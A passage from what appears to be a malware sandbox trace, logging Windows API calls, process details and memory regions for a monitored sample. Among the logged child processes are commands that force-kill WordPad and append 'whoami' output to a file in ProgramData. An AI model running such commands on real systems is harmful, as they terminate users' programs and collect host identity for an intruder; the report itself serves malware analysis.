(HeapHandle=0x550000, Flags=0x8, Size=0xa) returned 0x55b238 [0228.824] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0228.827] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im wordpad.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im wordpad.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im wordpad.exe", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x108c, dwThreadId=0xfc8)) returned 1 [0228.848] CloseHandle (hObject=0x98) returned 1 [0228.849] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0228.849] GetProcessHeap () returned 0x550000 [0228.849] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x559e60) returned 1 [0228.849] GetEnvironmentStringsW () returned 0x559e60* [0228.849] GetProcessHeap () returned 0x550000 [0228.849] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa76) returned 0x557fe8 [0228.849] FreeEnvironmentStringsA (penv="=") returned 1 [0228.849] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0229.752] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0229.752] CloseHandle (hObject=0x9c) returned 1 [0229.753] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0229.753] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0229.753] GetProcessHeap () returned 0x550000 [0229.754] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x557fe8) returned 1 [0229.754] GetEnvironmentStringsW () returned 0x55b288* [0229.754] GetProcessHeap () returned 0x550000 [0229.754] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa9c) returned 0x557fe8 [0229.754] FreeEnvironmentStringsA (penv="=") returned 1 [0229.754] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0229.754] GetProcessHeap () returned 0x550000 [0229.755] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x557fe8) returned 1 [0229.755] GetEnvironmentStringsW () returned 0x55b288* [0229.755] GetProcessHeap () returned 0x550000 [0229.755] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa9c) returned 0x557fe8 [0229.755] FreeEnvironmentStringsA (penv="=") returned 1 [0229.755] GetProcessHeap () returned 0x550000 [0229.755] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55b238) returned 1 [0229.755] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0229.755] _get_osfhandle (_FileHandle=1) returned 0x144 [0229.755] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0229.755] _get_osfhandle (_FileHandle=1) returned 0x144 [0229.755] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0229.755] _get_osfhandle (_FileHandle=0) returned 0x140 [0229.755] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0229.755] GetConsoleOutputCP () returned 0x1b5 [0229.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0229.756] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.756] exit (_Code=128) Thread: id = 421 os_tid = 0x10b4 Process: id = "86" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2cea5000" os_pid = "0x108c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "85" os_parent_pid = "0x101c" cmd_line = "taskkill /f /im wordpad.exe" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6040 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6041 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6042 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 6043 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 6044 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 6045 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 6046 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 6047 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 6048 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6049 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6050 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6051 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6052 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 6053 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6054 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 6055 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6056 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 6057 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 6058 start_va = 0x4180000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 6059 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6060 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6061 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6062 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6063 start_va = 0x4400000 end_va = 0x46effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 6064 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6065 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6066 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6067 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6068 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6069 start_va = 0x45f0000 end_va = 0x46effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 6070 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6071 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6072 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6073 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 6074 start_va = 0x4190000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 6075 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6076 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6077 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6078 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6079 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6080 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6081 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6082 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6083 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6084 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6085 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6086 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6087 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 6088 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 6089 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6090 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6091 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 6092 start_va = 0x44c0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 6093 start_va = 0x41d0000 end_va = 0x41f9fff monitored = 0 entry_point = 0x41d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6094 start_va = 0x46f0000 end_va = 0x4877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046f0000" filename = "" Region: id = 6095 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6096 start_va = 0x4880000 end_va = 0x4a00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004880000" filename = "" Region: id = 6097 start_va = 0x4a10000 end_va = 0x5e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a10000" filename = "" Region: id = 6098 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6099 start_va = 0x4170000 end_va = 0x4170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004170000" filename = "" Region: id = 6100 start_va = 0x41d0000 end_va = 0x41d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 6101 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 6102 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 6103 start_va = 0x5e10000 end_va = 0x6146fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6104 start_va = 0x6150000 end_va = 0x6239fff monitored = 0 entry_point = 0x618d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6105 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 6106 start_va = 0x4520000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 6107 start_va = 0x6150000 end_va = 0x622ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 6108 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6109 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 6110 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6111 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 6112 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 6113 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 6114 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6115 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 6116 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 6117 start_va = 0x4570000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 6118 start_va = 0x45b0000 end_va = 0x45effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 6119 start_va = 0x6230000 end_va = 0x626ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 6120 start_va = 0x6270000 end_va = 0x62affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006270000" filename = "" Region: id = 6121 start_va = 0x62b0000 end_va = 0x62effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 6122 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 6123 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 6125 start_va = 0x44f0000 end_va = 0x44f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Thread: id = 422 os_tid = 0xfc8 Thread: id = 423 os_tid = 0x510 Thread: id = 424 os_tid = 0x1338 Thread: id = 425 os_tid = 0xf0c Thread: id = 426 os_tid = 0x10a8 Process: id = "87" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2cb30000" os_pid = "0xd24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"whoami >>C:\\ProgramData\\keEeR.txt\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6134 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6135 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6136 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6137 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6138 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6139 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6140 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6141 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6142 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6143 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6144 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 6145 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6146 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6147 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6148 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6149 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 6150 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6151 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 6152 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6153 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6154 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6155 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6156 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6157 start_va = 0x400000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6158 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6159 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6160 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6161 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6162 start_va = 0x540000 end_va = 0x5fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6163 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6164 